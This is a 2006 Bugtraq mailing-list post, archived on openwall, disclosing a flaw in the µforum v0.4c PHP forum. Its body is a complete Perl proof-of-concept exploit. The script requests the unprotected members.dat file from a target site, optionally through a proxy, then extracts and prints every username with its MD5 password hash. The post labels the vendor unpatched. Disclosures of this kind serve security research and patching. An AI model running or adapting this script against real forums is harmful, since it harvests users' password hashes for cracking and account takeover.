lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060901155319.10210.qmail@securityfocus.com>
Date: 1 Sep 2006 15:53:19 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc

#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";

my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);

if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host  !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);
   $req->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $res = $ua->request($req);
my $dat = $res->content;
my @tabl= split(/:/, $dat);

foreach (@tabl) {
      if($_ =~ /"(.*)";a/){
            print "\n".$1.'::';}

      if($_ =~ /"([a-z0-9]{32})";i/){
            print $1;}
}

print "\n";
exit(0);

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ